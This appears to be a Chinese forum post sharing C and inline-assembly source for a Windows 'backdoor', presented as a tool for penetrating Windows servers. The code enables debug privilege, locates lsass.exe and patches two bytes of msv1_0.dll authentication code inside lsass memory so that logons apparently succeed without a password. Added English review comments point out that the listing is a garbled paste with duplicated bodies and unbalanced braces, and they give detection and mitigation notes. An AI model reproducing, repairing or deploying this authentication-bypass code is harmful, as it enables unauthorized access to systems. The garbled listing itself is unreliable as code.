				c语言windows后门
在WINDOWS服务器渗透的时候可能用的着,也可以让xx界里的朋友学点东西
功能在帐户有组策略限制的时候,无法添加管理员账号的时候,
可以不用密码登陆。
测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。
// get.cpp : 定义控制台应用程序的入口点。
//
#include "stdio.h"
#include <windows.h>
#include <TLHELP32.H>
功能在帐户有组策略限制的时候,无法添加管理员账号的时候,
可以不用密码登陆。
测试在XP,2000,2003上过。运行后不需要用密码。模仿GOLDSUN的那个写的。
// get.cpp : 定义控制台应用程序的入口点。
//
#include "stdio.h"
#include <windows.h>
#include <TLHELP32.H>
// Enables SeDebugPrivilege (SE_DEBUG_NAME) on the current process token so
// that a later OpenProcess on a system process is not refused.
// NOTE(review): this listing is a mangled paste — the body appears twice,
// the inner copy is wrapped in a bare '{', and the braces never balance
// before the next function starts. It is kept as published, not repaired.
// Defects visible here: the results of LookupPrivilegeValue and
// AdjustTokenPrivileges are not checked, hToken is never closed, and on the
// failure path the function still reports TRUE.
// Defender note: SeDebugPrivilege is held only by administrators by default;
// a process enabling it and then opening lsass.exe is a standard EDR
// detection pattern, and this whole technique is blocked by LSA Protection
// (RunAsPPL) / Credential Guard on supported Windows versions.
BOOL EnablePriv() // raise process privileges
{
HANDLE hToken;
if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
{
TOKEN_PRIVILEGES tkp;
      
LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid ); // modify process privilege
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL ); // tell the system to modify the process privilege
{ // duplicated paste of the body above begins here
HANDLE hToken;
if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
{
TOKEN_PRIVILEGES tkp;
LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid ); // modify process privilege
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL ); // tell the system to modify the process privilege
// GetLastError is read without checking AdjustTokenPrivileges' own return value.
return( (GetLastError()==ERROR_SUCCESS) );
}
return TRUE;
}
return TRUE;
// Looks up the process id of lsass.exe by walking a Toolhelp32 process snapshot.
// NOTE(review): mangled paste — the '}' after the while loop closes the
// function early, which leaves CloseHandle outside any function, so the
// listing does not compile as published. As written the snapshot handle is
// never released and there is no return statement for the not-found case.
// CharLower rewrites pe32.szExeFile in place before the comparison.
// Defender note: a snapshot walk that matches on "lsass.exe" is itself a
// strong indicator of credential-access tooling.
DWORD getpid()
{
HANDLE toolhelp;
toolhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(PROCESSENTRY32);
BOOL bRet = Process32First(toolhelp,&pe32);
while(bRet)
{
if (0 == strcmp(CharLower(pe32.szExeFile),"lsass.exe")) return pe32.th32ProcessID;
bRet = Process32Next(toolhelp,&pe32);
}
} // stray brace: ends the function here
CloseHandle(toolhelp);
}
// Entry point. Loads msv1_0.dll into this process, locates a byte pattern in
// the mapped image with two inline x86 asm scans, then writes the two-byte
// `buffer` at that same address inside the lsass.exe process. The page claims
// this makes logon succeed without a password on XP/2000/2003; that is not
// verified here. It presumably relies on msv1_0.dll being mapped at the same
// base in both processes — TODO confirm; this would explain why the author
// limits it to pre-ASLR Windows.
// NOTE(review): mangled paste — the body is duplicated from the second '{'
// onward, the first asm scan ends in `jmp night` with no `night` label in
// either copy, and the braces do not balance. The listing does not
// compile as published and is left unrepaired.
// Defender notes: the observable behaviour is OpenProcess(PROCESS_ALL_ACCESS)
// on lsass.exe followed by WriteProcessMemory — Sysmon ProcessAccess /
// EDR telemetry on lsass handle opens is the detection, and LSA Protection
// (RunAsPPL) or Credential Guard prevents this class of in-memory patch.
// The return value of WriteProcessMemory is ignored; GetLastError is read
// unconditionally, so the printed code is meaningless on success.
int main(void)
{
HMODULE hmodule;
DWORD temp,pid;
HANDLE process;
char buffer[2];
DWORD writbyte;
EnablePriv();
hmodule = LoadLibrary("msv1_0.dll");
// first scan: walk forward from the module base until a 4-byte pattern matches
__asm{
pushad
mov eax,hmodule
bijiao: cmp byte PTR [eax],8bh
jnz sarchnext
cmp byte PTR [eax+1],4dh
jnz sarchnext
cmp byte PTR [eax+2],0ch
jnz sarchnext
cmp byte PTR [eax +3],49h
jz finds
{ // duplicated paste of the body above begins here
HMODULE hmodule;
DWORD temp,pid;
HANDLE process;
char buffer[2];
DWORD writbyte;
EnablePriv();
hmodule = LoadLibrary("msv1_0.dll");
__asm{
pushad
mov eax,hmodule
bijiao: cmp byte PTR [eax],8bh
jnz sarchnext
cmp byte PTR [eax+1],4dh
jnz sarchnext
cmp byte PTR [eax+2],0ch
jnz sarchnext
cmp byte PTR [eax +3],49h
jz finds
sarchnext:inc eax
jmp night
finds :
mov temp,eax
popad
}
// second scan: continue from the first hit until a 2-byte pattern matches
__asm{
pushad
mov eax,temp
sear: cmp byte PTR [eax],32h
jnz searnext
cmp byte PTR [eax+1],11000000b
jnz searnext
jz findss
searnext: inc eax
jmp sear
findss: mov temp,eax
popad
}
// memset((LPVOID)temp,0xb0,1);
// memset((LPVOID)(temp+1),0x01,1);
jmp night
finds :
mov temp,eax
popad
}
__asm{
pushad
mov eax,temp
sear: cmp byte PTR [eax],32h
jnz searnext
cmp byte PTR [eax+1],11000000b
jnz searnext
jz findss
searnext: inc eax
jmp sear
findss: mov temp,eax
popad
}
// memset((LPVOID)temp,0xb0,1);
// memset((LPVOID)(temp+1),0x01,1);
pid = getpid();
// cross-process write into lsass.exe at the address found in this process's mapping
process = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
memset(buffer,0xb0,1);
memset((LPVOID)(buffer+1),0x01,1);
WriteProcessMemory(process,(LPVOID)temp,buffer,sizeof(buffer),&writbyte);
writbyte =GetLastError(); // overwrites the byte count with the error code, whether or not the write failed
printf("%d",writbyte);
//MessageBox(NULL,"find ok","title",MB_OK);
// FreeLibrary(hmodule);
return 0;
// duplicated tail of the body above
process = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
memset(buffer,0xb0,1);
memset((LPVOID)(buffer+1),0x01,1);
WriteProcessMemory(process,(LPVOID)temp,buffer,sizeof(buffer),&writbyte);
writbyte =GetLastError();
printf("%d",writbyte);
//MessageBox(NULL,"find ok","title",MB_OK);
// FreeLibrary(hmodule);
return 0;
}